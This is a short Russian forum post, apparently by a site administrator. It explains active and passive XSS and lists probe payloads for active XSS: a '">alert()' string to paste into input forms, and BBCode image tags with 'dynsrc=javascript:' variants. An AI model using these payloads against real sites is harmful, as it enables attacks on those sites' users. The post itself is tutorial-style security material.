Администраторы
332 сообщений
Мужчина
|
XSS поделяют на: активные и пассивные. Отличия:
- Активная - Жертве достаточно открыть страницу с Java-кодом
- Пассивная - Нужно чтобы жертва перешла по ссылке
--- Пассивные - рассматривать не буду.
XSS атаки - это атаки не на сам сайт, а на пользователей сайта. XSS - это недоработка в фильтре, приложении.
Активные
1. Вы можете посмотреть тот который я описал в данной статье. (74%-86%)
2. Самый обычный для поиска уязвимости: ">alert('Search') вставлять в любые формы для ввода (Где исполнится - там и уязвимость)
3. Не менее популярен: [img]http://www.qwewqw.ru/1.jpg dynsrc=javascript:alert()[/im.g] (тут можно и шаманить)
Цитата [i*mg]http://www.qwewqw.ru/"/dynsrc=javascript:alert()/1.jpg[/img]
[.img]http://www.qweqw.ru/"/dynsrc="javascript:alert()"/1.jpg[/img.]
|
|
|
|
|
|
